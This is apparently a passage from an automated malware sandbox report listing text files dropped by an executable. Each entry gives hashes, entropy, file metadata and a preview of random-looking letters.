                                                                                                                                                                                                                                                                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                                                  MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                                                  SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                                                  SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                                                  SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                                                  MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                                                  SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                                                  SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                                                  SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                                                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                                                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                                                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                                                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                                                                                  Malicious:false
